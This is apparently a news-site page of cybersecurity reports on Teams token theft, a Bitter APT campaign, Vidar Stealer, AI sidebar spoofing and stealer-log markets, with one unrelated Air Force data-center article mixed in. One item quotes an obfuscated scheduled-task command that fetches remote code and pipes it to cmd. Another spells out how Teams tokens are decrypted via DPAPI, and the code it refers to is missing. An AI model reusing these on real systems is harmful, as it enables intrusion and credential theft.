Security researchers have discovered a sophisticated method that allows attackers to steal access tokens from Microsoft Teams, potentially granting unauthorized access to sensitive corporate communications, emails, and SharePoint documents. The attack vector represents a significant security risk for organizations relying on Microsoft’s productivity suite, as stolen tokens can be weaponized for lateral movement within company […]
A new phishing campaign is targeting Microsoft account holders by using a clever twist on OAuth authentication prompts. Instead of asking users to hand over their passwords directly, attackers are tricking people into granting permission to malicious applications through legitimate-looking Microsoft authorization screens. This method bypasses traditional password protection and multi-factor authentication, making it particularly […]
The Agenda ransomware group has evolved its attack methodology with a sophisticated technique that deploys Linux ransomware variants directly on Windows systems, challenging traditional endpoint security controls. The attack represents a significant tactical evolution in ransomware deployment strategies. Threat actors utilized WinSCP for secure file transfer to move Linux ransomware binaries onto Windows machines, then […]
The Bitter APT group, also tracked as APT-Q-37 and known in China as 蔓灵花, has launched a sophisticated cyberespionage campaign targeting government agencies, military installations, and critical infrastructure across China and Pakistan.
The threat actor has deployed weaponized Microsoft Office documents that exploit a previously unknown zero-day vulnerability in WinRAR archive software to install custom C# backdoors on victim systems.
This multi-pronged attack demonstrates a significant evolution in the group’s technical capabilities and persistence mechanisms.
The campaign leverages two distinct infection vectors to deliver malicious payloads. The first method employs VBA macro-laden Excel files disguised as legitimate conference documentation, while the second exploits a WinRAR path traversal vulnerability predating CVE-2023-38088.
Both approaches ultimately deploy the same C# backdoor designed to exfiltrate sensitive data and execute arbitrary commands from remote servers.
The attackers carefully crafted their social engineering lures to target specific personnel within government and defense sectors, indicating prior reconnaissance and victim profiling.
Qianxin analysts identified the malicious activity in October 2024 after detecting anomalous network traffic patterns originating from compromised systems.
The researchers traced the infrastructure back to command-and-control servers hosted on the esanojinjasvc.com domain, which was registered in April 2024 specifically for this operation.
Analysis revealed that the backdoor communicates with multiple subdomains including msoffice.365cloudz.esanojinjasvc.com, employing sophisticated encryption techniques to evade network-based detection systems.
The attack chain begins when victims receive phishing emails containing malicious RAR archives with names like “Provision of Information for Sectoral for AJK.rar.”
Upon extraction with vulnerable WinRAR versions (7.11 or earlier), the archive exploits a path traversal flaw to overwrite the user’s Normal.dotm template file.
Incident overview (Source – Qianxin)
When Microsoft Word subsequently launches, it automatically loads the compromised template, triggering embedded macros that download and execute the winnsc.exe backdoor from the remote server koliwooclients.com using SMB network shares.
Persistence Mechanisms and Backdoor Functionality
The malware establishes persistence through multiple redundant mechanisms to ensure continued access.
The macro code implements a function called periperi() that creates a batch file named kefe.bat in the Windows Startup directory.
This script establishes a scheduled task titled “OneDrive\Updates1100988844” that executes every 26 minutes, making POST requests to hxxps://www.keeferbeautytrends.com/d6Z2.php.
The scheduled task command utilizes string obfuscation techniques to evade signature-based detection:-
s^ch^t^a^s^k^s /create /tn "OneDrive\Updates1100988844" /f /sc minute /mo 26 /tr "conhost --headless cmd /v:on /c set 765=ht& set 665=tps:& set 565=!765!!665!& curl !465!.com/d6Z2.p^h^p?rz=%computername%SS | c^m^d"
The C# backdoor employs AES encryption for string obfuscation through a dedicated decryption function named gjfdkgitjkg().
This function decrypts critical configuration data including C2 URLs, file paths, and POST parameters.
The backdoor continuously collects system information including the temporary directory path, operating system architecture, and hostname, transmitting this data to hxxps://msoffice.365cloudz.esanojinjasvc.com/cloudzx/msweb/drxbds23.php.
Based on C2 server responses, the malware downloads additional executables, repairs their PE headers by adding the DOS signature {0x4D 0x5A}, validates the file structure, and executes them while reporting success or failure codes back to hxxps://msoffice.365cloudz.esanojinjasvc.com/cloudzx/msweb/drxcvg45.php.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
Air Force officials want private companies to build artificial intelligence data centers on more than 3,000 acres of land on five of its military bases, raising questions about security, ethics, and land use.
The Air Force bases—Davis-Monthan in Ariz., Edwards in Calif., Robins in Ga., Joint Base McGuire-Dix-Lakehurst in N.J., and Arnold in Tenn.—will make “underutilized” land available “for private commercial data center use,” according to an Oct. 15 and Oct. 21 request for lease proposal from the service published online.
“AI is transforming the modern world, and these data centers are crucial for America to remain at the forefront of innovation,” Robert Moriarty, the Air Force’s deputy assistant secretary of installations, said in an unpublished news release provided to Defense One.
The lease proposal follows a late July executive order in which President Donald Trump promised a “golden age for American manufacturing and technological dominance” by offering up federal land for AI data centers. But a national security expert said the unprecedented deal could blur the lines between public and private partnerships—and may make it hard for the military to regain control of that land in the future.
“I have never heard of something like this before, where some of the public land was going to be leased to private companies to use,” said Stacie Pettyjohn, a senior fellow and director of the Defense Program at the Center for a New American Security think tank. “I think it is noteworthy … because it is potentially ceding land that the U.S. government will actually never get control over again.”
The vast majority of the land, 2,115 acres, is spread across seven sites at Edwards Air Force Base, home to many of the service’s test aircraft projects. Pettyjohn said a private company having access to those bases and nearby training exercises and test facilities is concerning.
“If you're letting a lot of people on the base, there is a lot of room for potential espionage, let alone sabotage or things like that,” Pettyjohn said. “It does seem to be purely commercial and transactional, and a part of the broader administration's policy towards blurring the lines between private and public which, in some ways, is what you see in authoritarian states like China.”
Spaces at the other bases in the proposal include 300 acres in Arizona, 219 acres in Georgia., 193 acres in New Jersey, and 274 in Tennessee. An Air Force spokesperson said the service will “ensure the proper security precautions are taken to protect the installation and its assets.”
The AI boom has driven a need for land as well as for more electrical power to fuel the data centers, underscoring the Pentagon’s rapid search for companies to field nuclear microreactors as a supply source.
For the Air Force’s proposal, the chosen developer would be responsible for supplying “sufficient power and water,” with interest given to water-efficient technology, the service spokesperson said.
Additionally, companies must submit a “mitigation and contingency plan to ensure the local communities’ utilities service life, resiliency, and capacity are not impacted,” the spokesperson said.
The government can purchase AI data center services and power from the project, but “is under no obligation to do so,” according to the lease proposal. Companies must offer “fair-market value” for the land and a payment of $250,000 to the government. The developer must also have a prior history and show proof they’ve built three AI data centers drawing at least 100 megawatts of new contracted power within the last three years.
Responses to the Air Force’s solicitation are due by Nov. 14 and the service will select winning lease proposals by January 2026.
“The Department of the Air Force is focused on swiftly, yet effectively, selecting an industry leader as a lease applicant,” said Benjamin Kindt, the Air Force’s chief of real estate development, in the unpublished news release.
SquareX released critical research exposing a new class of attack targeting AI browsers. The AI Sidebar Spoofing attack leverages malicious browser extensions to impersonate trusted AI sidebar interfaces, which is used to trick users into executing dangerous commands that can lead to credential theft, device hijacking, and password exfiltration.
The research demonstrates how attackers can exploit users’ trust in AI browser sidebars – the primary interface through which users interact with AI browsers like Comet, as well as consumer browsers with AI features like Brave and Edge. By creating pixel-perfect replicas of legitimate AI sidebars, malicious extensions return AI-generated responses that include harmful instructions that unsuspecting users follow.
“AI has become an essential tool for millions of users to learn new skills and complete tasks. Unfortunately, this has created a dangerous dynamic where people blindly follow AI-generated instructions without the expertise to identify security risks,” explains Vivek Ramachandran, Founder and CEO of SquareX. “With no visual or workflow difference, the AI Sidebar Spoofing attack exploits the trust users place on these AI interfaces, tricking them into performing malicious tasks that they may not fully understand or are aware of.”
SquareX illustrates the AI Sidebar Spoofing attacks with three main case studies, but warns that we will likely see many variants of the attack develop. In one example, the user asks the AI sidebar how to withdraw cryptocurrency from their account. The fake AI Sidebar returns what looks like legitimate instructions but replaces the Binance login page URL with a phishing link. Thinking it was instructions generated by Comet, the user enters their credentials in the phishing site, which the attacker then uses to login to the victim’s account to access their cryptocurrency. In other examples, users were given false instructions to execute malicious commands that allowed attackers to exfiltrate passwords and hijack their device and execute ransomware attacks remotely.
The researchers also showed that other AI browsers and consumer browsers implementing AI sidebars like Edge, Firefox and Safari are equally vulnerable to the AI Sidebar Spoofing Attack. This means that even if organizations restrict the use of AI browsers, users are still subject to these attacks as it can be operated on any browser with an AI sidebar.
Surprisingly, these attacks require only basic browser extension permissions, commonly found in popular extensions like Grammarly and password managers, making them difficult to detect by simply looking at permission analysis. In fact, the AI Sidebar Spoofing extension can remain dormant, providing legitimate responses, until they see an opportunity to trick users into doing something malicious based on their prompt. Thus, it is absolutely critical that enterprises have both the ability to perform dynamic analysis on extension behavior at run time, as well as granular browser-native guardrails to warn and block users from following malicious instructions.
For more information, users can refer to the technical blog.
About SquareX
SquareX‘s browser extension turns any browser on any device into an enterprise-grade secure browser, including AI Browsers. SquareX’s industry-first Browser Detection and Response (BDR) solution empowers organizations to proactively defend against browser-native threats including rogue AI agents, Last Mile Reassembly Attacks, malicious extensions and identity attacks. Unlike dedicated enterprise browsers, SquareX seamlessly integrates with users’ existing consumer browsers, delivering security without compromising user experience. More information about SquareX’s research-led innovation at www.sqrx.com.
Contact Head of PR Junice Liew SquareX junice@sqrx.com
SquareX released critical research exposing a new class of attack targeting AI browsers. The AI Sidebar Spoofing attack leverages malicious browser extensions to impersonate trusted AI sidebar interfaces, which is used to trick users into executing dangerous commands that can lead to credential theft, device hijacking, and password exfiltration. The research demonstrates how attackers can […]
A new technique allows hackers to extract encrypted authentication tokens from Microsoft Teams on Windows, enabling unauthorized access to chats, emails, and SharePoint files.
In a blog post dated October 23, 2025, Brahim El Fikhi explains how these tokens, stored in a Chromium-like Cookies database, can be decrypted using Windows’ Data Protection API (DPAPI).
This method bypasses recent security hardening, posing risks for lateral movement and data exfiltration in enterprise environments.
These access tokens grant impersonation capabilities, such as sending Teams messages or emails on behalf of victims, which attackers can exploit for social engineering or persistence.
El Fikhi’s focus on desktop Office apps, especially Teams, highlights vulnerabilities in embedded browser components that handle authentication via login.microsoftonline.com. Microsoft’s ecosystem remains a prime target, with recent disruptions noted in threats against Teams as of early October 2025.
Early Microsoft Teams versions stored auth cookies in plaintext within the SQLite file at %AppData%\Local\Microsoft\Teams\Cookies, a flaw exposed by Vectra AI in 2022 that allowed simple file reads to harvest tokens for Graph API abuse, bypassing MFA.
Updates eliminated this plaintext storage, adopting encrypted formats aligned with Chromium’s cookie protection to prevent disk-based theft.
However, the shift introduces new attack vectors. Tokens now use AES-256-GCM encryption protected by DPAPI, a Windows API that ties keys to user or machine contexts for data isolation.
This relies on the user’s login credentials, making decryption feasible with local access but challenging remotely without privilege escalation. Similar protections in browsers like Chrome have been cracked via key extraction, a pattern echoed in Teams’ msedgewebview2.exe process.
Microsoft Teams Access Tokens Exfiltrated
To pinpoint token locations, researchers employed ProcMon from SysInternals, filtering for WriteFile operations on msedgewebview2.exe the embedded Edge WebView2 browser spawned by ms-teams.exe during login.
This process writes to the Cookies database, unlike the main executable, which avoids sensitive file I/O beyond logs.
The SQLite Cookies table holds critical entries: host_key (e.g., teams.microsoft.com), name (cookie identifier), and encrypted_value prefixed with “v10” (0x76 0x31 0x30), indicating Chromium’s version 10 encryption.
The schema parses as: 3-byte tag, 12-byte nonce (initialization vector), and the AES-encrypted payload. The master key is in %AppData%\Local\Packages\MSTeams_8wekyb3d8bbwe\LocalCache\Microsoft\MSTeams\EBWebView\Local State, a JSON file under os_crypt.encrypted_key—a Base64 string starting with “DPAPI” after decoding, protected by user-specific DPAPI blobs in %AppData%\Microsoft\Protect.
Extract and DPAPI-unprotect the key using Windows APIs like CryptUnprotectData, which requires the attacker’s context to match the user’s (e.g., via mimikatz for credential dumping).
Then, apply AES-256-GCM with the key and nonce to the payload, yielding the auth token. El Fikhi’s Rust PoC automates this, dumping tokens post-teams.exe termination to unlock the file, a standard limitation, as the process holds an exclusive lock. Python equivalents, like those for Chrome, demonstrate similar logic:
This code, adapted from browser forensics, directly applies to Teams. A GitHub PoC (teams_dump) lists and decrypts the database, outputting JSON with hosts like teams.microsoft.com and cookies like MUIDB or TSREGIONCOOKIE.
Mitigations
Tools like GraphSpy ingest the token for scoped abuse reading SharePoint or emails, limited to Teams permissions (e.g., Chat.ReadWrite, Mail.Send). Microsoft’s Primary Refresh Token (PRT) ties into this, enabling seamless SSO but amplifying token reuse risks across apps.
Mitigations include monitoring for ms-teams.exe kills or unusual ProcMon patterns, enforcing app-bound encryption, and preferring web-based Teams to avoid local storage.
Rotate tokens via Entra ID policies and audit API logs for anomalies. As Teams threats evolve, DPAPI-aware EDR rules are essential.
A sophisticated information-stealing malware known as Vidar Stealer has undergone a complete architectural transformation with the release of version 2.0, introducing advanced capabilities that enable it to bypass Chrome’s latest security protections through direct memory injection techniques.
Released on October 6, 2025, by its developer “Loadbaks” on underground forums, this new iteration features a complete rewrite from C++ to pure C, implementing a multithreaded architecture that significantly enhances its data exfiltration speed and evasion capabilities.
The timing of Vidar 2.0’s emergence coincides with a notable decline in Lumma Stealer activity, positioning Vidar as a potential successor in the information stealer ecosystem.
Priced at $300 for lifetime access, the malware offers cybercriminals a cost-effective yet powerful toolset capable of systematically targeting credentials from browsers, cryptocurrency wallets, cloud services, gaming platforms, and communication applications including Discord and Telegram.
The malware’s enhanced anti-analysis measures and sophisticated credential extraction methods represent a concerning evolution in the information stealer threat landscape.
Vidar developer announcing the release of version 2.0 (Source – Trend Micro)
Vidar originally emerged in 2018 on Russian-language underground forums, initially leveraging the Arkei stealer source code.
Over the years, it has distinguished itself from competitors like Raccoon and RedLine through consistent updates supporting new browsers, wallets, and two-factor authentication applications.
Trend Micro analysts identified that the latest version introduces four significant architectural changes: a complete C language rewrite for enhanced stability and speed, a multithreaded system that dynamically scales based on victim computer specifications, advanced browser credential extraction capabilities, and an automatic polymorphic builder that generates unique binary signatures for each build.
The multithreaded architecture represents one of Vidar 2.0’s most significant enhancements, allowing the malware to perform data collection tasks across multiple parallel threads.
This system automatically adjusts performance by creating more worker threads on powerful systems and fewer threads on weaker machines, ensuring optimal operation without overwhelming the target.
The parallel processing significantly reduces the time the malware needs to remain active on compromised systems, making detection and intervention by security software substantially more challenging.
Chrome AppBound Encryption Bypass Through Memory Injection
Vidar 2.0’s most notable technical achievement involves its capability to bypass Chrome’s AppBound encryption protections through sophisticated memory injection techniques.
According to the developer, the malware has “implemented unique appBound methods that aren’t found in the public domain,” specifically targeting Chrome’s enhanced security measures designed to prevent unauthorized credential extraction by binding encryption keys to specific applications.
This represents a direct challenge to Chrome’s latest security enhancements aimed at protecting user credentials from information stealers.
The malware employs a tiered approach to browser credential extraction, initially attempting traditional methods such as systematic enumeration of browser profiles and extraction of encryption keys from Local State files using standard DPAPI decryption.
When these conventional techniques fail against Chrome’s AppBound encryption, Vidar 2.0 escalates to an advanced technique that launches target browsers with debugging enabled and injects malicious code directly into running browser processes using either shellcode or reflective DLL injection.
Vidar 2.0’s execution flow (Source – Trend Micro)
The injected payload operates entirely within browser memory, extracting encryption keys directly from the active process address space rather than attempting to decrypt them from storage.
This memory-based approach effectively circumvents Chrome’s AppBound encryption because it steals keys that are already decrypted and in use by the legitimate browser process.
The stolen encryption keys are then communicated back to the main malware process via named pipes, a technique that avoids creating disk artifacts that could be detected by forensic analysis or security software.
This dual-pronged extraction strategy targeting both traditional browser storage methods and Chrome’s latest protections across multiple browser platforms including Chrome, Firefox, Edge, and other Chromium-based browsers demonstrates the malware’s comprehensive approach to credential theft.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
The stealer malware ecosystem has evolved into a sophisticated criminal enterprise capable of processing hundreds of millions of credentials daily.
Over the past several years, threat actors have transformed the landscape of credential theft through specialized malware families and underground distribution platforms.
These information-stealing operations now represent one of the most significant threats to digital security, with criminal networks establishing complex hierarchies to manage the harvest and distribution of stolen authentication data.
Recent investigations into the stealer log ecosystem have revealed an alarming scale of operations. A single Telegram account monitored by security researchers was observed ingesting as many as 50 million credentials within a 24-hour period.
The infrastructure supporting these operations has grown increasingly sophisticated, with threat actors utilizing messaging platforms, particularly Telegram, as their primary distribution channel.
These platforms serve as marketplaces where stolen data is bought, sold, and freely shared among criminal communities.
The criminal ecosystem operates through a tiered structure consisting of three primary groups. Primary sellers manage key operations and maintain both public channels where stealer logs are shared and paid private channels offering premium access to clients.
Early prototype of the initial project (Source – Synthient)
Aggregators collect stealer logs from multiple sources and redistribute them through their channels, often providing search capabilities for victims across specific sites.
Traffers work in cooperation with primary sellers to spread malware, occasionally operating their own channels to demonstrate their effectiveness.
Synthient analysts identified this hierarchical structure while monitoring the platforms and building systems to ingest shared data in hopes of helping victims.
The motivations driving these operations vary across groups. While primary sellers focus on monetizing stolen credentials through subscription models, aggregators often leak data publicly to gain attention and reputation within criminal communities.
This creates a complex web where the same stolen credentials may appear across multiple channels in various formats.
Some channels advertise access to billions of credential lines, with pricing models ranging from weekly subscriptions at 60 dollars to lifetime access for 600 dollars, demonstrating the commercialization of cybercrime.
The volume of credentials flowing through these channels has reached staggering proportions. Analysis of one major operation revealed that over the course of monitoring, researchers indexed approximately 30 billion Telegram messages and parsed 80 billion credentials.
During peak activity periods, the system processed 600 million credentials in a single day and indexed 1.2 billion messages within the same timeframe.
Technical Infrastructure and Data Formats
The technical implementation of stealer log distribution presents unique challenges for both criminals and researchers.
Threat actors employ multiple credential formats depending on the malware family and distribution method. The most common formats include simple combolist structures using delimiters such as colons, semicolons, or pipes to separate email addresses and passwords.
More sophisticated formats follow URL-Login-Password conventions, while stealer logs from actual malware infections contain structured data with labeled fields.
The inconsistency in data formats creates operational challenges for aggregators attempting to consolidate stolen credentials.
Synthient researchers noted that aggregators often merge multiple files from different resellers, creating what they described as “pseudo-unique abominations” that combine various credential formats.
This complexity is further compounded when primary sellers password-protect their archives with links to their channels, preventing aggregators from easily claiming credit for the data.
The technical hurdles require sophisticated parsing systems capable of identifying and processing credentials regardless of their original format or packaging method.
Follow us on Google News, LinkedIn, and X to Get More Instant Updates, Set CSN as a Preferred Source in Google.
.webp)
.webp)
.webp)
.webp)